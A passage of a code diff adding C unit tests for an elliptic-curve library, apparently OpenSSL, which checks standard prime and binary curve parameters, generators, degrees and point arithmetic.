+
+    if (!BN_hex2bn(&x, "4A96B5688EF573284664698968C38BB913CBFC82"))
+        ABORT;
+    if (!BN_hex2bn(&y, "23a628553168947d59dcc912042351377ac5fb32"))
+        ABORT;
+    if (!EC_POINT_set_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!BN_hex2bn(&z, "0100000000000000000001F4C8F927AED3CA752257"))
+        ABORT;
+    if (!EC_GROUP_set_generator(group, P, z, BN_value_one()))
+        ABORT;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    fprintf(stdout, "\nSEC2 curve secp160r1 -- Generator:\n     x = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, "\n     y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, "\n");
+    /* G_y value taken from the standard: */
+    if (!BN_hex2bn(&z, "23a628553168947d59dcc912042351377ac5fb32"))
+        ABORT;
+    if (0 != BN_cmp(y, z))
+        ABORT;
+
+    fprintf(stdout, "verify degree ...");
+    if (EC_GROUP_get_degree(group) != 160)
+        ABORT;
+    fprintf(stdout, " ok\n");
+
+    group_order_tests(group);
+
+    if (!(P_160 = EC_GROUP_new(EC_GROUP_method_of(group))))
+        ABORT;
+    if (!EC_GROUP_copy(P_160, group))
+        ABORT;
+
+    /* Curve P-192 (FIPS PUB 186-2, App. 6) */
+
+    if (!BN_hex2bn(&p, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF"))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn(&a, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFC"))
+        ABORT;
+    if (!BN_hex2bn(&b, "64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1"))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    if (!BN_hex2bn(&x, "188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012"))
+        ABORT;
+    if (!EC_POINT_set_compressed_coordinates_GFp(group, P, x, 1, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!BN_hex2bn(&z, "FFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831"))
+        ABORT;
+    if (!EC_GROUP_set_generator(group, P, z, BN_value_one()))
+        ABORT;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    fprintf(stdout, "\nNIST curve P-192 -- Generator:\n     x = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, "\n     y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, "\n");
+    /* G_y value taken from the standard: */
+    if (!BN_hex2bn(&z, "07192B95FFC8DA78631011ED6B24CDD573F977A11E794811"))
+        ABORT;
+    if (0 != BN_cmp(y, z))
+        ABORT;
+
+    fprintf(stdout, "verify degree ...");
+    if (EC_GROUP_get_degree(group) != 192)
+        ABORT;
+    fprintf(stdout, " ok\n");
+
+    group_order_tests(group);
+
+    if (!(P_192 = EC_GROUP_new(EC_GROUP_method_of(group))))
+        ABORT;
+    if (!EC_GROUP_copy(P_192, group))
+        ABORT;
+
+    /* Curve P-224 (FIPS PUB 186-2, App. 6) */
+
+    if (!BN_hex2bn
+        (&p, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF000000000000000000000001"))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn
+        (&a, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFE"))
+        ABORT;
+    if (!BN_hex2bn
+        (&b, "B4050A850C04B3ABF54132565044B0B7D7BFD8BA270B39432355FFB4"))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    if (!BN_hex2bn
+        (&x, "B70E0CBD6BB4BF7F321390B94A03C1D356C21122343280D6115C1D21"))
+        ABORT;
+    if (!EC_POINT_set_compressed_coordinates_GFp(group, P, x, 0, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!BN_hex2bn
+        (&z, "FFFFFFFFFFFFFFFFFFFFFFFFFFFF16A2E0B8F03E13DD29455C5C2A3D"))
+        ABORT;
+    if (!EC_GROUP_set_generator(group, P, z, BN_value_one()))
+        ABORT;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    fprintf(stdout, "\nNIST curve P-224 -- Generator:\n     x = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, "\n     y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, "\n");
+    /* G_y value taken from the standard: */
+    if (!BN_hex2bn
+        (&z, "BD376388B5F723FB4C22DFE6CD4375A05A07476444D5819985007E34"))
+        ABORT;
+    if (0 != BN_cmp(y, z))
+        ABORT;
+
+    fprintf(stdout, "verify degree ...");
+    if (EC_GROUP_get_degree(group) != 224)
+        ABORT;
+    fprintf(stdout, " ok\n");
+
+    group_order_tests(group);
+
+    if (!(P_224 = EC_GROUP_new(EC_GROUP_method_of(group))))
+        ABORT;
+    if (!EC_GROUP_copy(P_224, group))
+        ABORT;
+
+    /* Curve P-256 (FIPS PUB 186-2, App. 6) */
+
+    if (!BN_hex2bn
+        (&p,
+         "FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF"))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn
+        (&a,
+         "FFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC"))
+        ABORT;
+    if (!BN_hex2bn
+        (&b,
+         "5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B"))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    if (!BN_hex2bn
+        (&x,
+         "6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296"))
+        ABORT;
+    if (!EC_POINT_set_compressed_coordinates_GFp(group, P, x, 1, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!BN_hex2bn(&z, "FFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E"
+                   "84F3B9CAC2FC632551"))
+        ABORT;
+    if (!EC_GROUP_set_generator(group, P, z, BN_value_one()))
+        ABORT;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    fprintf(stdout, "\nNIST curve P-256 -- Generator:\n     x = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, "\n     y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, "\n");
+    /* G_y value taken from the standard: */
+    if (!BN_hex2bn
+        (&z,
+         "4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5"))
+        ABORT;
+    if (0 != BN_cmp(y, z))
+        ABORT;
+
+    fprintf(stdout, "verify degree ...");
+    if (EC_GROUP_get_degree(group) != 256)
+        ABORT;
+    fprintf(stdout, " ok\n");
+
+    group_order_tests(group);
+
+    if (!(P_256 = EC_GROUP_new(EC_GROUP_method_of(group))))
+        ABORT;
+    if (!EC_GROUP_copy(P_256, group))
+        ABORT;
+
+    /* Curve P-384 (FIPS PUB 186-2, App. 6) */
+
+    if (!BN_hex2bn(&p, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFEFFFFFFFF0000000000000000FFFFFFFF"))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn(&a, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFEFFFFFFFF0000000000000000FFFFFFFC"))
+        ABORT;
+    if (!BN_hex2bn(&b, "B3312FA7E23EE7E4988E056BE3F82D19181D9C6EFE8141"
+                   "120314088F5013875AC656398D8A2ED19D2A85C8EDD3EC2AEF"))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    if (!BN_hex2bn(&x, "AA87CA22BE8B05378EB1C71EF320AD746E1D3B628BA79B"
+                   "9859F741E082542A385502F25DBF55296C3A545E3872760AB7"))
+        ABORT;
+    if (!EC_POINT_set_compressed_coordinates_GFp(group, P, x, 1, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!BN_hex2bn(&z, "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973"))
+        ABORT;
+    if (!EC_GROUP_set_generator(group, P, z, BN_value_one()))
+        ABORT;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    fprintf(stdout, "\nNIST curve P-384 -- Generator:\n     x = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, "\n     y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, "\n");
+    /* G_y value taken from the standard: */
+    if (!BN_hex2bn(&z, "3617DE4A96262C6F5D9E98BF9292DC29F8F41DBD289A14"
+                   "7CE9DA3113B5F0B8C00A60B1CE1D7E819D7A431D7C90EA0E5F"))
+        ABORT;
+    if (0 != BN_cmp(y, z))
+        ABORT;
+
+    fprintf(stdout, "verify degree ...");
+    if (EC_GROUP_get_degree(group) != 384)
+        ABORT;
+    fprintf(stdout, " ok\n");
+
+    group_order_tests(group);
+
+    if (!(P_384 = EC_GROUP_new(EC_GROUP_method_of(group))))
+        ABORT;
+    if (!EC_GROUP_copy(P_384, group))
+        ABORT;
+
+    /* Curve P-521 (FIPS PUB 186-2, App. 6) */
+
+    if (!BN_hex2bn(&p, "1FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFFFFFFFFFFFF"))
+        ABORT;
+    if (1 != BN_is_prime_ex(p, BN_prime_checks, ctx, NULL))
+        ABORT;
+    if (!BN_hex2bn(&a, "1FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFFFFFFFFFFFC"))
+        ABORT;
+    if (!BN_hex2bn(&b, "051953EB9618E1C9A1F929A21A0B68540EEA2DA725B99B"
+                   "315F3B8B489918EF109E156193951EC7E937B1652C0BD3BB1BF073573"
+                   "DF883D2C34F1EF451FD46B503F00"))
+        ABORT;
+    if (!EC_GROUP_set_curve_GFp(group, p, a, b, ctx))
+        ABORT;
+
+    if (!BN_hex2bn(&x, "C6858E06B70404E9CD9E3ECB662395B4429C648139053F"
+                   "B521F828AF606B4D3DBAA14B5E77EFE75928FE1DC127A2FFA8DE3348B"
+                   "3C1856A429BF97E7E31C2E5BD66"))
+        ABORT;
+    if (!EC_POINT_set_compressed_coordinates_GFp(group, P, x, 0, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!BN_hex2bn(&z, "1FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF"
+                   "FFFFFFFFFFFFFFFFFFFFA51868783BF2F966B7FCC0148F709A5D03BB5"
+                   "C9B8899C47AEBB6FB71E91386409"))
+        ABORT;
+    if (!EC_GROUP_set_generator(group, P, z, BN_value_one()))
+        ABORT;
+
+    if (!EC_POINT_get_affine_coordinates_GFp(group, P, x, y, ctx))
+        ABORT;
+    fprintf(stdout, "\nNIST curve P-521 -- Generator:\n     x = 0x");
+    BN_print_fp(stdout, x);
+    fprintf(stdout, "\n     y = 0x");
+    BN_print_fp(stdout, y);
+    fprintf(stdout, "\n");
+    /* G_y value taken from the standard: */
+    if (!BN_hex2bn(&z, "11839296A789A3BC0045C8A5FB42C7D1BD998F54449579"
+                   "B446817AFBD17273E662C97EE72995EF42640C550B9013FAD0761353C"
+                   "7086A272C24088BE94769FD16650"))
+        ABORT;
+    if (0 != BN_cmp(y, z))
+        ABORT;
+
+    fprintf(stdout, "verify degree ...");
+    if (EC_GROUP_get_degree(group) != 521)
+        ABORT;
+    fprintf(stdout, " ok\n");
+
+    group_order_tests(group);
+
+    if (!(P_521 = EC_GROUP_new(EC_GROUP_method_of(group))))
+        ABORT;
+    if (!EC_GROUP_copy(P_521, group))
+        ABORT;
+
+    /* more tests using the last curve */
+
+    if (!EC_POINT_copy(Q, P))
+        ABORT;
+    if (EC_POINT_is_at_infinity(group, Q))
+        ABORT;
+    if (!EC_POINT_dbl(group, P, P, ctx))
+        ABORT;
+    if (!EC_POINT_is_on_curve(group, P, ctx))
+        ABORT;
+    if (!EC_POINT_invert(group, Q, ctx))
+        ABORT;                  /* P = -2Q */
+
+    if (!EC_POINT_add(group, R, P, Q, ctx))
+        ABORT;
+    if (!EC_POINT_add(group, R, R, Q, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, R))
+        ABORT;                  /* R = P + 2Q */
+
+    {
+        const EC_POINT *points[4];
+        const BIGNUM *scalars[4];
+        BIGNUM scalar3;
+
+        if (EC_POINT_is_at_infinity(group, Q))
+            ABORT;
+        points[0] = Q;
+        points[1] = Q;
+        points[2] = Q;
+        points[3] = Q;
+
+        if (!EC_GROUP_get_order(group, z, ctx))
+            ABORT;
+        if (!BN_add(y, z, BN_value_one()))
+            ABORT;
+        if (BN_is_odd(y))
+            ABORT;
+        if (!BN_rshift1(y, y))
+            ABORT;
+        scalars[0] = y;         /* (group order + 1)/2, so y*Q + y*Q = Q */
+        scalars[1] = y;
+
+        fprintf(stdout, "combined multiplication ...");
+        fflush(stdout);
+
+        /* z is still the group order */
+        if (!EC_POINTs_mul(group, P, NULL, 2, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINTs_mul(group, R, z, 2, points, scalars, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, P, R, ctx))
+            ABORT;
+        if (0 != EC_POINT_cmp(group, R, Q, ctx))
+            ABORT;
+
+        fprintf(stdout, ".");
+        fflush(stdout);
+
+        if (!BN_pseudo_rand(y, BN_num_bits(y), 0, 0))
+            ABORT;
+        if (!BN_add(z, z, y))
+            ABORT;
+        BN_set_negative(z, 1);
+        scalars[0] = y;
+        scalars[1] = z;         /* z = -(order + y) */
+
+        if (!EC_POINTs_mul(group, P, NULL, 2, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINT_is_at_infinity(group, P))
+            ABORT;
+
+        fprintf(stdout, ".");
+        fflush(stdout);
+
+        if (!BN_pseudo_rand(x, BN_num_bits(y) - 1, 0, 0))
+            ABORT;
+        if (!BN_add(z, x, y))
+            ABORT;
+        BN_set_negative(z, 1);
+        scalars[0] = x;
+        scalars[1] = y;
+        scalars[2] = z;         /* z = -(x+y) */
+
+        BN_init(&scalar3);
+        BN_zero(&scalar3);
+        scalars[3] = &scalar3;
+
+        if (!EC_POINTs_mul(group, P, NULL, 4, points, scalars, ctx))
+            ABORT;
+        if (!EC_POINT_is_at_infinity(group, P))
+            ABORT;
+
+        fprintf(stdout, " ok\n\n");
+
+        BN_free(&scalar3);
+    }
+
+# if 0
+    timings(P_160, TIMING_BASE_PT, ctx);
+    timings(P_160, TIMING_RAND_PT, ctx);
+    timings(P_160, TIMING_SIMUL, ctx);
+    timings(P_192, TIMING_BASE_PT, ctx);
+    timings(P_192, TIMING_RAND_PT, ctx);
+    timings(P_192, TIMING_SIMUL, ctx);
+    timings(P_224, TIMING_BASE_PT, ctx);
+    timings(P_224, TIMING_RAND_PT, ctx);
+    timings(P_224, TIMING_SIMUL, ctx);
+    timings(P_256, TIMING_BASE_PT, ctx);
+    timings(P_256, TIMING_RAND_PT, ctx);
+    timings(P_256, TIMING_SIMUL, ctx);
+    timings(P_384, TIMING_BASE_PT, ctx);
+    timings(P_384, TIMING_RAND_PT, ctx);
+    timings(P_384, TIMING_SIMUL, ctx);
+    timings(P_521, TIMING_BASE_PT, ctx);
+    timings(P_521, TIMING_RAND_PT, ctx);
+    timings(P_521, TIMING_SIMUL, ctx);
+# endif
+
+    if (ctx)
+        BN_CTX_free(ctx);
+    BN_free(p);
+    BN_free(a);
+    BN_free(b);
+    EC_GROUP_free(group);
+    EC_POINT_free(P);
+    EC_POINT_free(Q);
+    EC_POINT_free(R);
+    BN_free(x);
+    BN_free(y);
+    BN_free(z);
+
+    if (P_160)
+        EC_GROUP_free(P_160);
+    if (P_192)
+        EC_GROUP_free(P_192);
+    if (P_224)
+        EC_GROUP_free(P_224);
+    if (P_256)
+        EC_GROUP_free(P_256);
+    if (P_384)
+        EC_GROUP_free(P_384);
+    if (P_521)
+        EC_GROUP_free(P_521);
+
+}
+
+/* Change test based on whether binary point compression is enabled or not. */
+# ifdef OPENSSL_EC_BIN_PT_COMP
+#  define CHAR2_CURVE_TEST_INTERNAL(_name, _p, _a, _b, _x, _y, _y_bit, _order, _cof, _degree, _variable) \
+        if (!BN_hex2bn(&x, _x)) ABORT; \
+        if (!EC_POINT_set_compressed_coordinates_GF2m(group, P, x, _y_bit, ctx)) ABORT; \
+        if (!EC_POINT_is_on_curve(group, P, ctx)) ABORT; \
+        if (!BN_hex2bn(&z, _order)) ABORT; \
+        if (!BN_hex2bn(&cof, _cof)) ABORT; \
+        if (!EC_GROUP_set_generator(group, P, z, cof)) ABORT; \
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, P, x, y, ctx)) ABORT; \
+        fprintf(stdout, "\n%s -- Generator:\n     x = 0x", _name); \
+        BN_print_fp(stdout, x); \
+        fprintf(stdout, "\n     y = 0x"); \
+        BN_print_fp(stdout, y); \
+        fprintf(stdout, "\n"); \
+        /* G_y value taken from the standard: */ \
+        if (!BN_hex2bn(&z, _y)) ABORT; \
+        if (0 != BN_cmp(y, z)) ABORT;
+# else
+#  define CHAR2_CURVE_TEST_INTERNAL(_name, _p, _a, _b, _x, _y, _y_bit, _order, _cof, _degree, _variable) \
+        if (!BN_hex2bn(&x, _x)) ABORT; \
+        if (!BN_hex2bn(&y, _y)) ABORT; \
+        if (!EC_POINT_set_affine_coordinates_GF2m(group, P, x, y, ctx)) ABORT; \
+        if (!EC_POINT_is_on_curve(group, P, ctx)) ABORT; \
+        if (!BN_hex2bn(&z, _order)) ABORT; \
+        if (!BN_hex2bn(&cof, _cof)) ABORT; \
+        if (!EC_GROUP_set_generator(group, P, z, cof)) ABORT; \
+        fprintf(stdout, "\n%s -- Generator:\n     x = 0x", _name); \
+        BN_print_fp(stdout, x); \
+        fprintf(stdout, "\n     y = 0x"); \
+        BN_print_fp(stdout, y); \
+        fprintf(stdout, "\n");
+# endif
+
+# define CHAR2_CURVE_TEST(_name, _p, _a, _b, _x, _y, _y_bit, _order, _cof, _degree, _variable) \
+        if (!BN_hex2bn(&p, _p)) ABORT; \
+        if (!BN_hex2bn(&a, _a)) ABORT; \
+        if (!BN_hex2bn(&b, _b)) ABORT; \
+        if (!EC_GROUP_set_curve_GF2m(group, p, a, b, ctx)) ABORT; \
+        CHAR2_CURVE_TEST_INTERNAL(_name, _p, _a, _b, _x, _y, _y_bit, _order, _cof, _degree, _variable) \
+        fprintf(stdout, "verify degree ..."); \
+        if (EC_GROUP_get_degree(group) != _degree) ABORT; \
+        fprintf(stdout, " ok\n"); \
+        group_order_tests(group); \
+        if (!(_variable = EC_GROUP_new(EC_GROUP_method_of(group)))) ABORT; \
+        if (!EC_GROUP_copy(_variable, group)) ABORT; \
+
+# ifndef OPENSSL_NO_EC2M
+
+static void char2_field_tests(void)
+{
+    BN_CTX *ctx = NULL;
+    BIGNUM *p, *a, *b;
+    EC_GROUP *group;
+    EC_GROUP *C2_K163 = NULL, *C2_K233 = NULL, *C2_K283 = NULL, *C2_K409 =
+        NULL, *C2_K571 = NULL;
+    EC_GROUP *C2_B163 = NULL, *C2_B233 = NULL, *C2_B283 = NULL, *C2_B409 =
+        NULL, *C2_B571 = NULL;
+    EC_POINT *P, *Q, *R;
+    BIGNUM *x, *y, *z, *cof;
+    unsigned char buf[100];
+    size_t i, len;
+    int k;
+
+#  if 1                         /* optional */
+    ctx = BN_CTX_new();
+    if (!ctx)
+        ABORT;
+#  endif
+
+    p = BN_new();
+    a = BN_new();
+    b = BN_new();
+    if (!p || !a || !b)
+        ABORT;
+
+    if (!BN_hex2bn(&p, "13"))
+        ABORT;
+    if (!BN_hex2bn(&a, "3"))
+        ABORT;
+    if (!BN_hex2bn(&b, "1"))
+        ABORT;
+
+    group = EC_GROUP_new(EC_GF2m_simple_method()); /* applications should use
+                                                    * EC_GROUP_new_curve_GF2m
+                                                    * so that the library gets
+                                                    * to choose the EC_METHOD */
+    if (!group)
+        ABORT;
+    if (!EC_GROUP_set_curve_GF2m(group, p, a, b, ctx))
+        ABORT;
+
+    {
+        EC_GROUP *tmp;
+        tmp = EC_GROUP_new(EC_GROUP_method_of(group));
+        if (!tmp)
+            ABORT;
+        if (!EC_GROUP_copy(tmp, group))
+            ABORT;
+        EC_GROUP_free(group);
+        group = tmp;
+    }
+
+    if (!EC_GROUP_get_curve_GF2m(group, p, a, b, ctx))
+        ABORT;
+
+    fprintf(stdout,
+            "Curve defined by Weierstrass equation\n     y^2 + x*y = x^3 + a*x^2 + b  (mod 0x");
+    BN_print_fp(stdout, p);
+    fprintf(stdout, ")\n     a = 0x");
+    BN_print_fp(stdout, a);
+    fprintf(stdout, "\n     b = 0x");
+    BN_print_fp(stdout, b);
+    fprintf(stdout, "\n(0x... means binary polynomial)\n");
+
+    P = EC_POINT_new(group);
+    Q = EC_POINT_new(group);
+    R = EC_POINT_new(group);
+    if (!P || !Q || !R)
+        ABORT;
+
+    if (!EC_POINT_set_to_infinity(group, P))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, P))
+        ABORT;
+
+    buf[0] = 0;
+    if (!EC_POINT_oct2point(group, Q, buf, 1, ctx))
+        ABORT;
+
+    if (!EC_POINT_add(group, P, P, Q, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, P))
+        ABORT;
+
+    x = BN_new();
+    y = BN_new();
+    z = BN_new();
+    cof = BN_new();
+    if (!x || !y || !z || !cof)
+        ABORT;
+
+    if (!BN_hex2bn(&x, "6"))
+        ABORT;
+/* Change test based on whether binary point compression is enabled or not. */
+#  ifdef OPENSSL_EC_BIN_PT_COMP
+    if (!EC_POINT_set_compressed_coordinates_GF2m(group, Q, x, 1, ctx))
+        ABORT;
+#  else
+    if (!BN_hex2bn(&y, "8"))
+        ABORT;
+    if (!EC_POINT_set_affine_coordinates_GF2m(group, Q, x, y, ctx))
+        ABORT;
+#  endif
+    if (!EC_POINT_is_on_curve(group, Q, ctx)) {
+/* Change test based on whether binary point compression is enabled or not. */
+#  ifdef OPENSSL_EC_BIN_PT_COMP
+        if (!EC_POINT_get_affine_coordinates_GF2m(group, Q, x, y, ctx))
+            ABORT;
+#  endif
+        fprintf(stderr, "Point is not on curve: x = 0x");
+        BN_print_fp(stderr, x);
+        fprintf(stderr, ", y = 0x");
+        BN_print_fp(stderr, y);
+        fprintf(stderr, "\n");
+        ABORT;
+    }
+
+    fprintf(stdout, "A cyclic subgroup:\n");
+    k = 100;
+    do {
+        if (k-- == 0)
+            ABORT;
+
+        if (EC_POINT_is_at_infinity(group, P))
+            fprintf(stdout, "     point at infinity\n");
+        else {
+            if (!EC_POINT_get_affine_coordinates_GF2m(group, P, x, y, ctx))
+                ABORT;
+
+            fprintf(stdout, "     x = 0x");
+            BN_print_fp(stdout, x);
+            fprintf(stdout, ", y = 0x");
+            BN_print_fp(stdout, y);
+            fprintf(stdout, "\n");
+        }
+
+        if (!EC_POINT_copy(R, P))
+            ABORT;
+        if (!EC_POINT_add(group, P, P, Q, ctx))
+            ABORT;
+    }
+    while (!EC_POINT_is_at_infinity(group, P));
+
+    if (!EC_POINT_add(group, P, Q, R, ctx))
+        ABORT;
+    if (!EC_POINT_is_at_infinity(group, P))
+        ABORT;
+
+/* Change test based on whether binary point compression is enabled or not. */
+#  ifdef OPENSSL_EC_BIN_PT_COMP
+    len =
+        EC_POINT_point2oct(group, Q, POINT_CONVERSION_COMPRESSED, buf,
+                           sizeof buf, ctx);
+    if (len == 0)
+        ABORT;
+    if (!EC_POINT_oct2point(group, P, buf, len, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, Q, ctx))
+        ABORT;
+    fprintf(stdout, "Generator as octet string, compressed form:\n     ");
+    for (i = 0; i < len; i++)
+        fprintf(stdout, "%02X", buf[i]);
+#  endif
+
+    len =
+        EC_POINT_point2oct(group, Q, POINT_CONVERSION_UNCOMPRESSED, buf,
+                           sizeof buf, ctx);
+    if (len == 0)
+        ABORT;
+    if (!EC_POINT_oct2point(group, P, buf, len, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, Q, ctx))
+        ABORT;
+    fprintf(stdout, "\nGenerator as octet string, uncompressed form:\n     ");
+    for (i = 0; i < len; i++)
+        fprintf(stdout, "%02X", buf[i]);
+
+/* Change test based on whether binary point compression is enabled or not. */
+#  ifdef OPENSSL_EC_BIN_PT_COMP
+    len =
+        EC_POINT_point2oct(group, Q, POINT_CONVERSION_HYBRID, buf, sizeof buf,
+                           ctx);
+    if (len == 0)
+        ABORT;
+    if (!EC_POINT_oct2point(group, P, buf, len, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, Q, ctx))
+        ABORT;
+    fprintf(stdout, "\nGenerator as octet string, hybrid form:\n     ");
+    for (i = 0; i < len; i++)
+        fprintf(stdout, "%02X", buf[i]);
+#  endif
+
+    fprintf(stdout, "\n");
+
+    if (!EC_POINT_invert(group, P, ctx))
+        ABORT;
+    if (0 != EC_POINT_cmp(group, P, R, ctx))
+        ABORT;
+
+    /* Curve K-163 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve K-163",
+         "0800000000000000000000000000000000000000C9",
+         "1",
+         "1",
+         "02FE13C0537BBC11ACAA07D793DE4E6D5E5C94EEE8",
+         "0289070FB05D38FF58321F2E800536D538CCDAA3D9",
+         1, "04000000000000000000020108A2E0CC0D99F8A5EF", "2", 163, C2_K163);
+
+    /* Curve B-163 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve B-163",
+         "0800000000000000000000000000000000000000C9",
+         "1",
+         "020A601907B8C953CA1481EB10512F78744A3205FD",
+         "03F0EBA16286A2D57EA0991168D4994637E8343E36",
+         "00D51FBC6C71A0094FA2CDD545B11C5C0C797324F1",
+         1, "040000000000000000000292FE77E70C12A4234C33", "2", 163, C2_B163);
+
+    /* Curve K-233 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve K-233",
+         "020000000000000000000000000000000000000004000000000000000001",
+         "0",
+         "1",
+         "017232BA853A7E731AF129F22FF4149563A419C26BF50A4C9D6EEFAD6126",
+         "01DB537DECE819B7F70F555A67C427A8CD9BF18AEB9B56E0C11056FAE6A3",
+         0,
+         "008000000000000000000000000000069D5BB915BCD46EFB1AD5F173ABDF",
+         "4", 233, C2_K233);
+
+    /* Curve B-233 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve B-233",
+         "020000000000000000000000000000000000000004000000000000000001",
+         "000000000000000000000000000000000000000000000000000000000001",
+         "0066647EDE6C332C7F8C0923BB58213B333B20E9CE4281FE115F7D8F90AD",
+         "00FAC9DFCBAC8313BB2139F1BB755FEF65BC391F8B36F8F8EB7371FD558B",
+         "01006A08A41903350678E58528BEBF8A0BEFF867A7CA36716F7E01F81052",
+         1,
+         "01000000000000000000000000000013E974E72F8A6922031D2603CFE0D7",
+         "2", 233, C2_B233);
+
+    /* Curve K-283 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve K-283",
+         "0800000000000000000000000000000000000000000000000000000000000000000010A1",
+         "0",
+         "1",
+         "0503213F78CA44883F1A3B8162F188E553CD265F23C1567A16876913B0C2AC2458492836",
+         "01CCDA380F1C9E318D90F95D07E5426FE87E45C0E8184698E45962364E34116177DD2259",
+         0,
+         "01FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE9AE2ED07577265DFF7F94451E061E163C61",
+         "4", 283, C2_K283);
+
+    /* Curve B-283 (FIPS PUB 186-2, App. 6) */
+    CHAR2_CURVE_TEST
+        ("NIST curve B-283",
+         "0800000000000000000000000000000000000000000000000000000000000000000010A1",
+         "000000000000000000000000000000000000000000000000000000000000000000000001",
+         "027B680AC8B8596DA5A4AF8A19A0303FCA97FD7645309FA2A581485AF6263E313B79A2F5",
+         "05F939258DB7DD90E1934F8C70B0DFEC2EED25B8557EAC9C80E2E198F8CDBECD86B12053",
+         "03676854FE24141CB98FE6D4B20D02B4516FF702350EDDB0826779C813F0DF45BE8112F4",
+         1,
